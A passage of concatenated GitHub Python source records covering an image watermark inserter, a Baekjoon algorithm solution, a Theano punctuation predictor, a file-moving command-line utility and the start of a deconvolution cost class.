c\n\n\ndef whether_rectangles_overlap(r1_coords, r2_coords):\n if r1_coords[0] >= r2_coords[2] or r1_coords[2] <= r2_coords[0] \\\n or r1_coords[3] <= r2_coords[1] or r1_coords[1] >= r2_coords[3]:\n return False\n return True\n\n\ndef get_scaled_watermarks(wmark_img, min_scale):\n scaled_wmark_imgs = {}\n for wmark_scale in scale_generator(min_scale):\n scaled_wmark_imgs[wmark_scale] = cv2.resize(\n wmark_img, (0, 0), fx=wmark_scale, fy=wmark_scale\n )\n return scaled_wmark_imgs\n\n\ndef scale_generator(min_scale):\n for s_i in range(10, int(min_scale * 10) - 1, -1):\n wmark_scale_to_yield = round(s_i / 10, 1)\n yield wmark_scale_to_yield\n\n\ndef find_suitable_areas(unsuitable_blocks, img_w, img_h, gr_img, edges_img):\n \"\"\"Find areas to place watermarks having different size.\n\n Arguments:\n not_suitable_blocks {[type]} -- areas unsuitable for watermarks.\n \"\"\"\n suitable_areas = []\n for wmark_scale in scale_generator(args.min_wm_scale):\n cur_scl_not_suitable_blocks = set(unsuitable_blocks)\n spinner = Spinner(\n f'Available space estimating for watermark scale {wmark_scale}...',\n )\n # Watermark current width and height in pixels.\n scaled_mark_width = round(wm_w * wmark_scale)\n scaled_mark_height = round(wm_h * wmark_scale)\n # The values are used to determine if at least one watermark can be\n # placed.\n marks_in_img_along_x = img_w // scaled_mark_width\n marks_in_img_along_y = img_h // scaled_mark_height\n if marks_in_img_along_x > 0 and marks_in_img_along_y > 0:\n y = 0\n while y + scaled_mark_height < img_h:\n x = 0\n # Filter out blocks above y.\n cur_scl_not_suitable_blocks = set(filter(\n lambda bl: bl[3] >= y,\n cur_scl_not_suitable_blocks\n ))\n while x + scaled_mark_width < img_w:\n potential_mark_rect = (\n x, y, x + scaled_mark_width,\n y + scaled_mark_height\n )\n overlapped_blocks = list(filter(\n lambda bl: whether_rectangles_overlap(bl, potential_mark_rect),\n cur_scl_not_suitable_blocks\n ))\n if len(overlapped_blocks) == 0:\n # ROI - region of interest, it's an input image\n # fragment.\n gr_roi = gr_img[\n y:y + scaled_mark_height, x:x + scaled_mark_width\n ].flatten()\n edges_roi = edges_img[\n y:y + scaled_mark_height, x:x + scaled_mark_width\n ].flatten()\n dark_pxls_amount = (gr_roi < c.DARK_PXLS_THRESHOLD).sum()\n too_many_dark_pxls = dark_pxls_amount > c.DARK_PXLS_ALLOWED_AMOUNT\n edge_pxls_amount = (edges_roi > 0).sum()\n too_many_edges = edge_pxls_amount > c.EDGE_PXLS_ALLOWED_AMOUNT\n if (not args.consider_dark_pxls or not too_many_dark_pxls) and (not args.consider_edges or not too_many_edges):\n suitable_areas.append(\n {\n 'rect_coords': potential_mark_rect,\n 'wmark_scale': wmark_scale\n }\n )\n x += scaled_mark_width - c.STEP\n cur_scl_not_suitable_blocks.add(\n potential_mark_rect\n )\n x += c.STEP\n unsuitable_blocks |= cur_scl_not_suitable_blocks\n y += c.STEP\n spinner.next()\n spinner.finish()\n return suitable_areas\n\n\ndef insert_watermarks(input_img_path):\n print(f'\"{input_img_path}\" is being processed...')\n input_img_path = os.path.join(\n c.PROGRAM_DIR, args.input_dir, input_img_path\n )\n input_img = cv2.imread(input_img_path)\n input_img_h, input_img_w = input_img.shape[:2]\n # Add transparency to the input image.\n input_img = np.dstack(\n [input_img, np.ones((input_img_h, input_img_w), dtype='uint8') * 255]\n )\n # The processed images are used in suitable area checks.\n gr_input_img = cv2.cvtColor(input_img, cv2.COLOR_RGB2GRAY)\n blurred_gr_input_img = cv2.GaussianBlur(gr_input_img, (5, 5), 0)\n edges_input_img = cv2.Canny(\n blurred_gr_input_img, c.CANNY_THRESHOLD_1, c.CANNY_THRESHOLD_2\n )\n # Detecting words.\n unsuitable_blocks = set()\n if args.use_OCR:\n print(f'{input_img_path} text detecting in progress...')\n data = pytesseract.image_to_data(input_img, lang='eng+rus')\n for word_info in data.splitlines()[1:]:\n word_info = word_info.split()\n if len(word_info) == 12:\n x, y, width, height = map(int, word_info[6:10])\n unsuitable_blocks.add((x, y, x + width, y + height))\n\n suitable_areas = find_suitable_areas(\n unsuitable_blocks, input_img_w, input_img_h, gr_input_img,\n edges_input_img\n )\n if len(suitable_areas) != 0:\n # Watermark partial coverage.\n areas_to_use_amount = round(round(args.used_areas_percentage / 100, 3) * len(suitable_areas))\n # If areas_to_use_amount is 0, make it 1.\n areas_to_use_amount = areas_to_use_amount or 1\n shuffle(suitable_areas)\n suitable_areas = suitable_areas[:areas_to_use_amount]\n\n # Draw suitable area outlines.\n if c.SHOW_WMARK_AREA_OUTLINES:\n for s_area in suitable_areas:\n cv2.rectangle(\n input_img, s_area['rect_coords'][:2],\n s_area['rect_coords'][2:],\n (255, 0, 0), 1\n )\n\n # Insert one or more watermarks.\n overlay = np.zeros((input_img_h, input_img_w, 4), dtype='uint8')\n for s_area in suitable_areas:\n overlay[\n s_area['rect_coords'][1]:s_area['rect_coords'][3],\n s_area['rect_coords'][0]:s_area['rect_coords'][2]\n ] = scaled_wmark_imgs[s_area['wmark_scale']]\n\n # Make black areas where watermark will be inserted.\n (ov_B, ov_G, ov_R, ov_A) = cv2.split(overlay)\n (img_B, img_G, img_R, img_A) = cv2.split(input_img)\n ov_A_wm_absence = ov_A == 0\n input_img = cv2.merge([\n img_B * ov_A_wm_absence, img_G * ov_A_wm_absence,\n img_R * ov_A_wm_absence, img_A\n ])\n # Create image by cutting out watermark areas in input image.\n ov_A_wm_presence = ov_A != 0\n img_B *= ov_A_wm_presence\n img_G *= ov_A_wm_presence\n img_R *= ov_A_wm_presence\n inp_img_cutout = cv2.merge([img_B // 2, img_G // 2, img_R // 2, img_A])\n # cv2.imshow(f'inp_img_cutout for {input_img_path}', inp_img_cutout)\n\n # Blend the input image with the overlay.\n cv2.addWeighted(overlay, .7, input_img, 1.0, 0, input_img)\n cv2.addWeighted(inp_img_cutout, .7, input_img, 1.0, 0, input_img)\n # cv2.imshow(f'result for {input_img_path}', input_img)\n # cv2.waitKey(0)\n\n # Save image with inserted watermark.\n inpt_img_name = input_img_path[input_img_path.rfind(os.path.sep) + 1:]\n result_img_path = os.path.join(\n c.PROGRAM_DIR, args.output_dir,\n f'{inpt_img_name.partition(\".\")[0]}_processed.png'\n )\n cv2.imwrite(result_img_path, input_img)\n else:\n print(f'WARNING: image {input_img_path} has no suitable space to insert watermarks!')\n\n\nif __name__ == '__main__':\n if args.use_OCR:\n pytesseract.pytesseract.tesseract_cmd = args.tesseract_path\n # Check paths for existence.\n if not os.path.exists(args.wm_path):\n print('ERROR: Such watermark image file doesn\\'n exist!')\n exit(1)\n if not os.path.exists(args.input_dir):\n print(f'ERROR: \"{args.input_dir}\" directory doesn\\'t exist! Specify '\n 'another path for input images directory or create it and move '\n 'images there.')\n exit(2)\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n # Read watermark image.\n wmark_img = cv2.imread(args.wm_path, cv2.IMREAD_UNCHANGED)\n (wm_h, wm_w) = wmark_img.shape[:2]\n # Opacity bug correction.\n (B, G, R, A) = cv2.split(wmark_img)\n B = cv2.bitwise_and(B, B, mask=A)\n G = cv2.bitwise_and(G, G, mask=A)\n R = cv2.bitwise_and(R, R, mask=A)\n wmark_img = cv2.merge([B, G, R, A])\n\n # Get scaled watermarks.\n scaled_wmark_imgs = get_scaled_watermarks(wmark_img, args.min_wm_scale)\n\n # Process all images placed in input images directory.\n input_files = os.listdir(args.input_dir)\n # Filter images among all files existing in the directory.\n input_imgs = list(filter(\n lambda file: file[file.rfind('.') + 1:] in c.ACCEPTABLE_FILE_EXTENSIONS,\n input_files\n ))\n if len(input_imgs) == 0:\n print(f'ERROR: \"{args.input_dir}\" directory has no images!')\n exit(3)\n\n for input_img_path in input_imgs:\n insert_watermarks(input_img_path)\n\n print(f'Elapsed time is {time() - c.START_TIME} seconds.', end='\\n\\n')\n","repo_name":"LaHesis/WatermarksAllocator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9916438381","text":"# 화살표 그리기\r\n\"\"\"\r\n직선 위에 위치를 나타내는 0, 1, 2, ...와 같은 음수가 아닌 정수들이 일정한 간격으로 오른쪽 방향으로 놓여 있다.\r\n이러한 위치들 중 N개의 위치에 하나씩 점들이 주어진다(<그림 1>). 주어진 점들의 위치는 모두 다르다.\r\n두 점 사이의 거리는 두 점의 위치를 나타내는 수들의 차이이다. <그림 1>에서는 4개의 점이 주어지고 점 a와 b의 거리는 3이다.\r\n\r\n<그림 1>\r\n각 점은 N개의 색깔 중 하나를 가진다. 편의상, 색깔은 1부터 N까지의 수로 표시한다.\r\n각 점 p에 대해서, p에서 시작하는 직선 화살표를 이용해서 다른 점 q에 연결하려고 한다. 여기서, 점 q는 p와 같은 색깔의 점들 중 p와 거리가 가장 가까운 점이어야 한다.\r\n만약 가장 가까운 점이 두 개 이상이면 아무거나 하나를 선택한다.\r\n모든 점에 대해서 같은 색깔을 가진 다른 점이 항상 존재한다. 따라서 각 점 p에서 시작하여 위 조건을 만족하는 q로 가는 하나의 화살표를 항상 그릴 수 있다.\r\n예를 들어, 점들을 순서쌍 (위치, 색깔) 로 표시할 때, a = (0,1), b = (1, 2), c = (3, 1), d = (4, 2), e = (5, 1)라고 하자.\r\n아래 <그림 2>에서 이 점들을 표시한다. 여기서 흰색은 1, 검은색은 2에 해당된다\r\n\r\n<그림 2>\r\n위의 조건으로 화살표를 그리면, 아래 <그림 3>과 같이 점 a의 화살표는 c로 연결된다. 점 b와 d의 화살표는 각각 d와 b로 연결된다.\r\n또한 점 c와 e의 화살표는 각각 e와 c로 연결된다. 따라서 모든 화살표들의 길이 합은 3 + 3 + 2 + 3 + 2 = 13이다.\r\n\r\n<그림 3>\r\n점들의 위치와 색깔이 주어질 때, 모든 점에서 시작하는 화살표들의 길이 합을 출력하는 프로그램을 작성하시오.\r\n\"\"\"\r\nimport sys\r\n\r\npoints = []\r\nN = int(sys.stdin.readline().rstrip())\r\nfor _ in range(N):\r\n points.append(tuple(list(map(int, sys.stdin.readline().rstrip().split()))))\r\npoints.sort(key=lambda x: x[0])\r\n\r\n\r\ndef get_distance_sum(array_points):\r\n left_distance = float('inf')\r\n result = 0\r\n for i in range(len(array_points)):\r\n if i + 1 < len(array_points):\r\n right_distance = abs(array_points[i + 1][0] - array_points[i][0])\r\n result += min(left_distance, right_distance)\r\n left_distance = right_distance\r\n else:\r\n result += left_distance\r\n\r\n return result\r\n\r\n\r\nresult = 0\r\nfor i in range(1, N + 1):\r\n same_colored_points = []\r\n for j in range(N):\r\n if points[j][1] == i:\r\n same_colored_points.append(points[j])\r\n result += get_distance_sum(same_colored_points)\r\n\r\nprint(result)\r\n","repo_name":"JunInMay/journey-to-baekjoon","sub_path":"baekjoon/baekjoon_15970.py","file_name":"baekjoon_15970.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2756653681","text":"# coding: utf-8\nfrom __future__ import division\nimport sys\nimport os\nimport codecs\nfrom optparse import OptionParser\nfrom utilities import *\nimport models as models\n\nimport theano\nimport theano.tensor as T\nimport numpy as np\n\nMAX_SEQUENCE_LENGTH = 50\n\ndef restore_unsequenced_test_data(test_data_path, word_vocabulary, predict_function, with_pause_feature, semitone_feature_names, write_groundtruth, sequence_length, output_text=None, output_pickle=None):\n\tproscript_data = read_proscript(test_data_path)\n\n\tpause_bins = create_pause_bins()\n\tsemitone_bins = create_semitone_bins()\n\n\tword_sequence = proscript_data['word'] + [END]\n\tpause_sequence = convert_value_to_level_sequence(proscript_data[PAUSE_FEATURE_NAME], pause_bins) + [0]\n\totherfeatures_sequences = [convert_value_to_level_sequence(proscript_data[feature_name], semitone_bins) + [0] for feature_name in semitone_feature_names]\n\n\ti = 0\n\twith codecs.open(output_text, 'w', 'utf-8') as f_out:\n\t\twhile True:\n\t\t\tsubsequence_words = word_sequence[i: i + sequence_length]\n\t\t\tsubsequence_wordIds = [word_vocabulary.get(w, word_vocabulary[UNK]) for w in subsequence_words]\n\t\t\t\n\t\t\tsubsequence_pauses = pause_sequence[i: i + sequence_length]\n\n\t\t\t#if write_groundtruth:\n\t\t\t#\tsubsequence_gold_reduced_puncIds = test_data['punc.red.id'][i: i + sequence_length]\n\t\t\t#\tsubsequence_gold_puncIds = test_data['punc.id'][i: i + sequence_length]\n\t\t\tother_subsequences = [otherfeatures_sequences[feature_index][i: i + sequence_length] for feature_index in range(len(semitone_feature_names))]\n\n\t\t\tif len(subsequence_wordIds) == 0:\n\t\t\t\tbreak\n\n\t\t\tif not with_pause_feature:\n\t\t\t\ty = predict_function(to_array(subsequence_wordIds))\n\t\t\telse:\n\t\t\t\tif len(other_subsequences) == 0:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses))\n\t\t\t\tif len(other_subsequences) == 1:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses), to_array(other_subsequences[0]))\n\t\t\t\tif len(other_subsequences) == 2:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses), to_array(other_subsequences[0]), to_array(other_subsequences[1]))\n\t\t\t\tif len(other_subsequences) == 3:\n\t\t\t\t\ty = predict_function(to_array(subsequence_wordIds), to_array(subsequence_pauses), to_array(other_subsequences[0]), to_array(other_subsequences[1]), to_array(other_subsequences[2]))\n\t\t\t \n\t\t\tpredicted_punctuation_sequence = [0] + [np.argmax(y_t.flatten()) for y_t in y]\n\t\t\t#print(predicted_punctuation_sequence)\n\n\t\t\tf_out.write(subsequence_words[0])\n\n\t\t\tlast_eos_idx = 0\n\t\t\tpunctuations = []\n\t\t\tfor y_t in y:\n\n\t\t\t\tp_i = np.argmax(y_t.flatten())\n\t\t\t\t#punctuation = reverse_punctuation_vocabulary[p_i]\n\t\t\t\tpunctuation = p_i\n\n\t\t\t\tpunctuations.append(punctuation)\n\n\t\t\t\tif punctuation in EOS_PUNCTUATION_CODES:\n\t\t\t\t\tlast_eos_idx = len(punctuations) # we intentionally want the index of next element\n\n\t\t\tif subsequence_words[-1] == END:\n\t\t\t\tstep = len(subsequence_words) - 1\n\t\t\telif last_eos_idx != 0:\n\t\t\t\tstep = last_eos_idx\n\t\t\telse:\n\t\t\t\tstep = len(subsequence_words) - 1\n\n\t\t\tfor j in range(step):\n\t\t\t\tif options.readable_format:\n\t\t\t\t\tif punctuations[j] == 0:\n\t\t\t\t\t\tf_out.write(\" \")\n\t\t\t\t\telse:\n\t\t\t\t\t\tf_out.write(PUNCTUATION_VOCABULARY[punctuations[j]] + \" \")\n\t\t\t\telse:\n\t\t\t\t\tf_out.write(\" \" + PUNCTUATION_VOCABULARY[punctuations[j]] + \" \")\n\t\t\t\tif j < step - 1:\n\t\t\t\t\ttry: \n\t\t\t\t\t\tf_out.write(subsequence_words[1+j])\n\t\t\t\t\texcept:\n\t\t\t\t\t\tf_out.write(\"\")\n\t\t\t\t\t\tprint(subsequence_words[1+j])\n\n\t\t\tif subsequence_words[-1] == END:\n\t\t\t\tbreak\n\n\t\t\ti += step\n\ndef main(options):\n\tif checkArgument(options.model_file):\n\t\tmodel_file = options.model_file\n\telse:\n\t\tsys.exit(\"Model file path argument missing\")\n\n\tif checkArgument(options.vocabulary_file):\n\t\tWORD_VOCAB_FILE = options.vocabulary_file\n\telse:\n\t\tsys.exit(\"Vocabulary file path argument missing\")\n\n\tif checkArgument(options.input_proscript, isFile=True):\n\t\tTEST_FILE = options.input_proscript\n\telse:\n\t\tsys.exit(\"File to punctuate is missing!\")\n\n\tif checkArgument(options.output_file):\n\t\toutput_file = options.output_file\n\telse:\n\t\tsys.exit(\"Output file path argument missing\")\n\n\tword_vocabulary = read_vocabulary(WORD_VOCAB_FILE)\n\n\tprint(\"Model: %s\"%model_file)\n\tprint(\"Test file: %s\"%TEST_FILE)\n\n\tx = T.imatrix('x')\n\tp = None\n\ta = None\n\tb = None\n\tc = None\n\n\tsemitone_feature_names = options.semitone_features\n\tnum_semitone_features = len(semitone_feature_names)\n\n\tif options.trained_with_pause:\n\t\tprint(\"Punctuating with pause\")\n\t\tp = T.imatrix('p')\n\telse:\n\t\tnum_semitone_features = -1\n\n\tprint(\"Semitone features (%i):\"%num_semitone_features)\n\n\tif num_semitone_features == 1: \n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[0]))\n\t\ta = T.imatrix('a')\n\telif num_semitone_features == 2:\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[0]))\n\t\ta = T.imatrix('a')\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[1]))\n\t\tb = T.imatrix('b')\n\telif num_semitone_features == 3: \n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[0]))\n\t\ta = T.imatrix('a')\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[1]))\n\t\tb = T.imatrix('b')\n\t\tprint(\"Punctuating with %s\"%(options.semitone_features[2]))\n\t\tc = T.imatrix('c')\n\telif num_semitone_features > 3:\n\t\tsys.exit(\"Too many features (for now)\")\n\n\tprint(\"Loading model parameters...\")\n\tnet, _ = models.load(model_file, 1, x, p=p, feature_a=a, feature_b=b, feature_c=c, num_semitone_features=num_semitone_features)\n\tinputs = [x] + [i for i in [p,a,b,c] if not i == None]\n\n\tprint(\"Building model...\")\n\tpredict = theano.function(inputs=inputs, outputs=net.y)\n\n\tprint(\"Generating punctuation...\")\n\t#restored_data = restore_sequenced_test_data(TEST_FILE, \n\t#\t\t\t\t\t\t\t\t\t\t\tpredict_function=predict, \n\t#\t\t\t\t\t\t\t\t\t\t\twith_pause_feature=options.trained_with_pause, \n\t#\t\t\t\t\t\t\t\t\t\t\tsemitone_feature_names=semitone_feature_names, \n\t#\t\t\t\t\t\t\t\t\t\t\treduced_punctuation=options.reduced_punctuation)\n\n\trestore_unsequenced_test_data(TEST_FILE,\n\t\t\t\t\t\t\t\t word_vocabulary=word_vocabulary,\n\t\t\t\t\t\t\t\t predict_function=predict, \n\t\t\t\t\t\t\t\t with_pause_feature=options.trained_with_pause, \n\t\t\t\t\t\t\t\t semitone_feature_names=semitone_feature_names, \n\t\t\t\t\t\t\t\t write_groundtruth=True,\n\t\t\t\t\t\t\t\t sequence_length=MAX_SEQUENCE_LENGTH,\n\t\t\t\t\t\t\t\t output_text=options.output_file)\n\n\tprint(\"Predictions written to %s.\"%output_file)\n\nif __name__ == \"__main__\":\n\tusage = \"usage: %prog [-s infile] [option]\"\n\tparser = OptionParser(usage=usage)\n\tparser.add_option(\"-m\", \"--model_file\", dest=\"model_file\", default=None, help=\"model filename\", type=\"string\")\n\tparser.add_option(\"-v\", \"--vocabulary_file\", dest=\"vocabulary_file\", default=None, help=\"vocabulary file (pickle)\", type=\"string\")\n\tparser.add_option(\"-i\", \"--input_proscript\", dest=\"input_proscript\", default=None, help=\"input proscript file (csv)\", type=\"string\")\n\tparser.add_option(\"-o\", \"--output_file\", dest=\"output_file\", default=100, help=\"output file to write predictions\", type=\"string\")\n\tparser.add_option(\"-p\", \"--trained_with_pause\", dest=\"trained_with_pause\", default=False, help=\"flag if trained with pause\", action=\"store_true\")\n\tparser.add_option(\"-f\", \"--semitone_features\", dest=\"semitone_features\", default=[], help=\"semitone feature names\", type=\"string\", action='append')\n\tparser.add_option(\"-r\", \"--readable_format\", dest=\"readable_format\", default=False, help=\"flag if output is desired in human readable format\", action='store_true')\n\n\t(options, args) = parser.parse_args()\n\n\tmain(options)","repo_name":"alpoktem/krisPunctuator","sub_path":"punctuator.py","file_name":"punctuator.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15449025934","text":"import argparse\nimport datetime\nimport logging\nimport os\nimport shutil\nimport sys\nimport traceback\nimport asys\n\nglobal version\nglobal logger\n\nlogger = logging.getLogger('movefile')\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG)\n\n# @Author: John Gooch\n# @Created: 20120613\n# @Updated: 20130911\nversion = \"3.4\"\n\n\n# @Name: File Move Script\n# @Description: Move file(s) from one folder to another, optionally adding a timestamp or throwing an error if no files are moved.\n# 20120904 - Added \"-o\" overwrite switch to permit overwriting existing files of the same name/path as the source.\n# 2.3 20121231 File output file name when timestamp is used. replaced string join with os.path.join when creating file paths.\n# 2.4 20130106\n# Fixed spelling errors in output messages..\n# 2.5 20130404\n# Replaced exit codes for failurs with exceptions. replaced os.rename with shutil.move , added timestamp formatting option\n# 3.0 20130710\n# Added Type option to specify special single file processing modes, such as NEWEST, OLDEST, etc. added findfiles to create list\n# of files to move, and removed file selection logic from the movefiles function\n# 3.1 20130904\n# Added -n negative logic to tell the script to move files that do not match the pattern.\n# 3.2 20130906\n# Remove local setGV function and replaced it with one imported from asys module. move error checking and setgv to top of main function from movefile\n# 3.3 20140326 #added prepend function and changed location of appended timestamp\n# @3.4 20140502 - Logging and moved common functions into asys module.\n\ndef initCLI():\n parser = argparse.ArgumentParser(description='File Move utility')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s {version}'.format(version=version))\n parser.add_argument('-s', action=\"store\", dest=\"src_file_path\", required=True, help='path of the files to move.')\n parser.add_argument('-d', action=\"store\", dest=\"dst_file_path\", required=True,\n help='path of the folder to move files to')\n parser.add_argument('-m', action=\"store\", dest=\"src_file_mask\", required=True,\n help='File name mask for files to move.')\n parser.add_argument('-l', action=\"store\", dest=\"level\", default=\"INFO\", required=False,\n help=\"Sets the logging level for the script. Default is INFO\")\n parser.add_argument('-o', action=\"store_true\", dest=\"overwrite\", required=False, default=False,\n help=\"Cause existing file of the same name/path to be overwritten.\")\n parser.add_argument('-t', action=\"store_true\", dest=\"timestamp\", required=False, default=False,\n help='Flag to append current data and time to file name')\n parser.add_argument('-T', action=\"store\", dest=\"type\", required=False, default=\"ALL\",\n help='Specifies processing mode for files. Default is ALL. Other options are OLDEST(single) NEWEST(single)')\n parser.add_argument('-e', action=\"store_true\", dest=\"error\", required=False, default=False,\n help='Flag to throw an error if no files are moved.')\n parser.add_argument('-f', action=\"store\", dest=\"format\", default=\"%Y%m%d\", required=False,\n help='Format for timestamp, if timestamp is enabled.')\n parser.add_argument('-n', action=\"store_true\", dest=\"negativelogic\", default=False, required=False,\n help='Work on filenames that do not match pattern.')\n parser.add_argument('-p', action=\"store_true\", dest=\"prepend\", default=False,\n help='Prepend timestamp to source file name.')\n args = parser.parse_args()\n return args\n\n\ndef initLogging(level):\n if not level:\n logger.setLevel(logging.WARNING)\n elif (level == \"DEBUG\"):\n logger.setLevel(logging.DEBUG)\n elif (level == \"INFO\"):\n logger.setLevel(logging.INFO)\n elif (level == \"WARNING\"):\n logger.setLevel(logging.WARNING)\n elif (level == \"ERROR\"):\n logger.setLevel(logging.ERROR)\n elif (level == \"CRITICAL\"):\n logger.setLevel(logging.CRITICAL)\n else:\n raise Exception(\"Exception setting logging level. Unrecognised level %s was specified\" % (level))\n return\n\n\ndef moveFiles(src_path, files, dst_path, timestamp, error, overwrite, format, prepend):\n logger.debug(\"original src_path=%s\" % (src_path))\n logger.debug(\"original dst_path=%s\" % (dst_path))\n moved_files = [] # list of source files moved\n skipped_files = []\n src_path = os.path.realpath(src_path)\n dst_path = os.path.realpath(dst_path)\n logger.debug(\"real src_path=%s\" % (src_path))\n logger.debug(\"real dst_path=%s\" % (dst_path))\n if os.path.exists(src_path) == False:\n logger.error(\"Source path %s is not accessible. Check path and permissions.\" % (src_path))\n raise Exception(\"Source path %s is not accessible. Check path and permissions.\" % (src_path))\n else:\n logger.debug(\"Source path %s exists.\" % (src_path))\n\n if os.path.exists(dst_path) == False:\n logger.error(\"Destination path %s is not accessible. Check path and permissions.\" % (dst_path))\n raise Exception(\"Destination path %s is not accessible. Check path and permissions.\" % (dst_path))\n else:\n logger.debug(\"Destination path %s exists.\" % (dst_path))\n logger.debug(\"Current working directory is %s\" % (os.getcwd()))\n logger.debug(\"Found %s files in %s \" % (len(files), src_path))\n for file in files:\n src_file_path = os.path.join(src_path, file)\n # if os.path.isfile(src_file_path) == False:\n # logger.debug( \"%s is not a regular file. Skipping.\" % ( src_file_path ) )\n # continue\n dst_filename = file\n if timestamp == True:\n (first_part, extension) = os.path.splitext(dst_filename)\n logger.debug(\"Result of splitext command on filename %s is basename %s extension %s\" % (\n dst_filename, first_part, extension))\n current_time = getTimestamp(format)\n if prepend:\n dst_filename = \"%s%s%s\" % (current_time, first_part, extension)\n else:\n dst_filename = \"%s%s%s\" % (first_part, extension, current_time)\n dst_file_path = os.path.join(dst_path, dst_filename)\n # if a file with the same name exists at the destination and overwrite is disabled, skip file\n if os.path.exists(dst_file_path) and not overwrite:\n logger.debug(\"Destination file %s already exists and overwrite is disabled. Skipping...\" % (dst_file_path))\n skipped_files.append(src_file_path)\n continue\n elif os.path.exists(dst_file_path) and overwrite:\n logger.debug(\"Overwriting destination file %s.\" % (dst_file_path))\n # move the file\n try:\n shutil.move(src_file_path, dst_file_path)\n logger.debug(\"Moved %s to %s\" % (src_file_path, dst_file_path))\n moved_files.append(src_file_path)\n except Exception:\n logger.error(\"Failed to moved file %s to %s\" % (src_file_path, dst_file_path))\n raise\n\n return (moved_files, skipped_files)\n\n\ndef getTimestamp(format):\n now = datetime.datetime.now()\n current_time = now.strftime(format)\n return current_time\n\n\ndef printReport(moved_files, skipped_files, dst_dir_path):\n dst_dir_path = os.path.realpath(dst_dir_path)\n logger.info(\"%d files moved to %s\" % (len(moved_files), dst_dir_path))\n for file in moved_files:\n logger.info(\"%s moved to %s\" % (file, dst_dir_path))\n logger.info(\"%d files skipped.\" % (len(skipped_files)))\n for file in skipped_files:\n logger.info(\"%s skipped.\" % (file))\n\n return 0\n\n\ndef main():\n global logger\n global moved_files\n global skipped_files\n global files\n global args\n print(\"%s version %s\".format(os.path.basename(sys.argv[0]), version))\n try:\n args = initCLI()\n except Exception as err:\n print(\"Failed to initialize the command line parameters. Reason %s\".format(str(err)))\n traceback.print_exc()\n return 2\n try:\n initLogging(args.level)\n except Exception as err:\n print(\"Failed to initialize logger. Reason: %s\".format(str(err)))\n traceback.print_exc()\n return 2\n\n try:\n if args.type in \"ALL\":\n files = asys.findFiles(args.src_file_path, args.src_file_mask, -1, args.negativelogic)\n elif args.type in \"OLDEST\":\n files = asys.findFiles(args.src_file_path, args.src_file_mask, 0, args.negativelogic)\n elif args.type in \"NEWEST\":\n files = asys.findFiles(args.src_file_path, args.src_file_mask, 1, args.negativelogic)\n else:\n logger.error(\"Exception. Operation type %s not recognized.\" % (type))\n return 2\n except Exception as err:\n logger.error(\"Exception finding files in %s. Reason: %s.\" % (args.src_file_path, str(err)))\n traceback.print_exc()\n return 2\n\n try:\n (moved_files, skipped_files) = moveFiles(args.src_file_path, files, args.dst_file_path, args.timestamp,\n args.error, args.overwrite, args.format, args.prepend)\n except Exception as err:\n logger.error(\"Failed to move files matching pattern %s from %s to %s. Reason: %s\" % (\n args.src_file_mask, args.src_file_path, args.dst_file_path, str(err)))\n traceback.print_exc()\n return 2\n\n\n try:\n printReport(moved_files, skipped_files, args.dst_file_path)\n except Exception as err:\n logger.error(\"Exception printing file move report. Reason: %s\" % (str(err)))\n traceback.print_exc()\n return 2\n\n if args.error == True and len(moved_files) == 0:\n logger.info(\"%d files found and the error flag is set. Returning 0.\" % (len(moved_files)))\n return 1\n else:\n return 0\n\n\nif __name__ == \"__main__\": main()\n","repo_name":"majorgear/python_scripts","sub_path":"bin/movefile.py","file_name":"movefile.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74937719800","text":"# -*- coding: utf-8 -*-\n\n\"\"\"COST FUNCTION\n\nThis module the class for the sf_deconvolveCost cost function.\n\n:Author: Samuel Farrens \n\n:Version: 1.1\n\n:Date: 20/10/2017\n\n\"\"\"\n\nfrom __future__ import print_function\nimport numpy as np\nfrom sf_tools.math.matrix import nuclear_norm\nfrom sf_tools.base.transform import cube2matrix\n\n\nclass sf_deconvolveCost(object):\n\n \"\"\"Cost function class for sf_deonvolve\n\n This class implements the cost function for deconvolution\n\n Parameters\n ----------\n y : np.ndarray\n Input original data array\n operator : function\n Matrix operator function\n wavelet : class, optional\n Wavelet operator class (\"sparse\" mode only)\n weights : np.ndarray, optional\n Array of wavelet thresholding weights (\"sparse\" mode only)\n lambda_lowr : float, optional\n Low-rank regularization parameter (\"lowr\" mode only)\n lambda_psf : float, optional\n PSF estimate regularization parameter (\"psf_unknown\" grad_type only)\n mode : str {'lowr', 'sparse'}, optional\n Deconvolution mode (default is \"lowr\")\n positivity : bool, optional\n Option to test positivity contraint (defult is \"True\")\n verbose : bool\n Option for verbose output (default is \"True\")\n\n \"\"\"\n\n def __init__(self, y, grad, wavelet=None, weights=None, lambda_lowr=None,\n lambda_psf=1, mode='lowr', positivity=True, verbose=True):\n\n self.y = y\n self.grad = grad\n self.wavelet = wavelet\n self.weights = weights\n self.lambda_lowr = lambda_lowr\n self.lambda_psf = lambda_psf\n self.mode = mode\n self.positivity = positivity\n self.verbose = verbose\n\n def grad_comp(self, x):\n \"\"\"Calculate gradient component of the cost\n\n This method returns the l2 norm error of the difference between the\n original data and the data obtained after optimisation\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float gradient cost component\n\n \"\"\"\n\n l2_norm = np.linalg.norm(self.y - self.grad.H_op(x))\n\n if self.verbose:\n print(' - L2 NORM (Grad):', l2_norm)\n\n return l2_norm\n\n def sparse_comp(self, 